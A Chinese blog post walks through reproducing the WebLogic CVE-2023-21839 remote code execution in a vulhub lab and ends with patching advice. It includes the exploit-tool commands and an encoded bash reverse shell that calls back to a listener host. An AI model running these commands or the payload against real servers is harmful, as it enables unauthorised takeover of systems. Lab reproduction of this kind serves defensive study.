Weblogic未授权远程代码执行漏洞 (CVE-2023-21839)

已于 2024-03-08 17:43:16 修改
阅读量792 收藏 1
点赞数
文章标签: web安全 安全 网络 漏洞
于 2023-08-09 15:42:17 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_69775412/article/details/132189767
版权

前言: Weblogic 允许远程用户在未经授权的情况下通过IIOP/T3进行JNDI lookup 操作,当JDK版本过低或本地存在javaSerializedData时,这可能会导致RCE漏洞。

0x00 环境设置

此次实验,我们使用P神的vulhub。启动环境:

cd /vulhub-master/weblogic/CVE-2023-21839
docker compose up -d

启动完成后访问http://your-ip:7001/console,可以看到管理界面。

0x01 验证漏洞

利用编译好的工具让目标靶机对dnslog平台发送请求:

CVE-2023-21839.exe -ip 192.168.2.103 -port 7001 -ldap ldap://g2zfh4.dnslog.cn/test

 

查看dnslog平台:

可以看到,平台成功接收到了我们利用工具对其发送的请求。

0x02 准备工作

此时打开一台kali用来生成shellpayload等待靶机远程加载:

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIuMTAwLzIzNDUgIDA+JjE=}

利用kali开启监听2345端口:

 ​​​​​​​

0x03 触发漏洞

windows上利用工具让靶机远程加载我们提前生成好的shellpayload:

CVE-2023-21839.exe -ip 192.168.2.103 -port 7001 -ldap ldap://192.168.2.100:1389/jxnf2s

 ​​​​​​​

可以看到此时kali这边接受到了远程请求:

0x04 获取SHELL

可以看到此时kali已经获取到了shell。

0x05 加固建议

  1. 使用连接筛选器临时阻止外部访问7001端口的T3/T3s协议
  2. 禁用IIOP协议。
  3. 升级weblogic版本,更新最新补丁。
阿一网络安全
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CVE-2023-21839Weblogic反序列化漏洞复现
薛定谔嘚喵博客
04-16 3887
WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。
CVE-2021-2109 Weblogic Server远程代码执行漏洞
m0_56642842的博客
06-24 3129
0x00 简介 WebLogic是美国甲骨文公司出品的一个application server(应用服务器),确切的说是一个基于JAVAEE架构的中间件,WebLogic主要用于开发、继承、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。 0x01 漏洞概述 CVE-2021-2109是存在于WebLogic Server的console中的一个远程代码执行漏洞,经过身份验证的攻击者可以直接通过JNDI远程执行命令或者注入代码,可以配合CVE-2020-14882授权漏洞执行任意
漏洞复现】Weblogic CVE-2023-21839
zg_111的博客
03-23 6461
Weblogic CVE-2023-21839漏洞复现
Weblogic 管理控制台授权远程命令执行漏洞CVE-2020-14882,CVE-2020-14883)
最新发布
weixin_45653478的博客
05-14 885
Weblogic Pre-Auth Remote Command Execution 漏洞CVE-2020-14882, CVE-2020-14883)是针对 Oracle WebLogic Server 的两个安全漏洞CVE-2020-14882 允许远程用户绕过管理员控制台组件中的身份验证,而 CVE-2020-14883 则允许经过身份验证的用户在管理员控制台组件上执行任意命令。
CVE-2023-21839远程代码执行漏洞
刘家华(游戏开发)
05-01 1543
weblogic CVE-2023-21839CVE-2023-21931、CVE-2023-21979远程代码执行漏洞复现。
Weblogic远程代码执行漏洞CVE-2023-21839)排大坑复现成功
huayimy的博客
04-20 1519
Weblogic远程代码执行漏洞CVE-2023-21839)排大坑复现成功
Weblogic远程代码执行漏洞(CVE-2020-14645)复现
锋刃科技的博客
07-25 4586
前言 WebLogic是美国Oracle公司出品的一个application server,是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。Oracle WebLogic Server存在远程代码执行漏洞。攻击者可利用漏洞实现远程代码执行。 环境搭建 下载地址: https://www.oracle.com/middleware/technologies/weblogic-server-insta.
Weblogic反序列化远程代码执行漏洞(CVE-2018-2893)以及安装步骤
11-23
Weblogic反序列化远程代码执行漏洞CVE-2018-2893)是Oracle WebLogic Server中一个严重安全问题,它允许攻击者通过发送恶意构造的序列化对象来执行任意代码,从而获得对服务器的完全控制。这个漏洞存在于WebLogic ...
cve-2020-14750.zip9(补丁升级)
05-26
2020年11月2日,Oracle官方发布了此安全警报针对Oracle WebLogic Server中的远程代码执行漏洞CVE-2020-14750,此漏洞可以在没有身份验证的情况下进行远程攻击,也就是说,可以在不需要用户名和密码的情况下通过网络...
JNDIExploit.v1.4 Weblogic-CVE-2023-21839
03-10
《深入解析JNDIExploit.v1.4与Weblogic-CVE-2023-21839安全漏洞网络安全领域中,漏洞利用技术一直是攻防两端的重要研究焦点。今天我们将深入探讨一个针对Weblogic服务器的严重安全漏洞——CVE-2023-21839,以及...
CVE-2023-21839:Oracle WebLogic Server RCE
qq_45747465的博客
07-07 546
努力提升自己呀
【高危】WebLogic Server 远程代码执行漏洞复现及攻击拦截 (CVE-2023-21839)
xsharkrasp的博客
05-18 580
近日,Oracle WebLogic Server被检测到远程代码执行漏洞(CVE-2023-21839),该漏洞允许经身份验证的远程攻击者通过T3/IIOP协议网络访问并破坏WebLogic服务器,成功利用此漏洞可导致关键数据的授权访问或直接获取WebLogic服务器权限。当远程对象继承自OpaqueReference时,客户端在对该对象进行JNDI查找并获取的时候,服务器端实际上是通过调用远程对象的getReferent()方法来获取该对象的实际引用。发起攻击请求:新建/tmp/1.txt文件。
CVE-2023-21839漏洞复现
qq_34914659的博客
02-28 4032
CVE-2023-21839漏洞复现
CVE-2023-21839 WebLogic Server RCE分析
Jay
04-18 795
在后续的进行lookup操作之前会检查 JNDI 环境是否已正确配置以访问远程资源,主要是对jndiEnvironment和remoteJNDIName的检测,如果在if中的任何一个条件为真,那么将调用对象的lookup方法,如果 if 语句中的所有条件都为假,则会进入检查cachedReferent字段的阶段。weblogic10 及以后的版本,不能直接使用server/lib 目录下的 weblogic.jar 了,需要手动执行一个命令生成手动生成 wlfullclient.jar。
Weblogic-CVE-2023-21839
Continuejww的博客
12-14 843
RCE漏洞,该漏洞允许经身份验证的远程,通过T3/IIOP协议网络访问并破坏WebLogic服务器,成功利用此漏洞可导致Oracle WebLogic服务器被接管,通过远程协议进行远程命令执行,当或本地存在小工具(javaSerializedData)时,可能导致远程代码执行。由此可见:CVE-2023-21839是一个weblogic的JNDI注入漏洞
Weblogic 远程命令执行漏洞CVE-2023-21839
Myu_wzy的博客
04-27 840
Weblogic 远程命令执行漏洞CVE-2023-21839
CVE-2023-21839
08-17
CVE-2023-21839是一个Weblogic漏洞,可以导致远程代码执行。根据引用提供的信息,可以使用nc工具进行端口监听,用于接收反弹的shell。你可以在给出的GitHub链接中找到可用的工具。使用该工具前,需要先编译为可执行文件。另外,在引用中提到,可以使用docker-compose启动CVE-2023-21839漏洞环境。具体命令为sudo docker-compose up -d。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [CVE-2023-21839Weblogic反序列化漏洞复现](https://blog.csdn.net/weixin_48539059/article/details/130101435)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 50%"] - *2* [CVE-2023-21839EXP可执行文件](https://download.csdn.net/download/qq_51577576/87559811)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值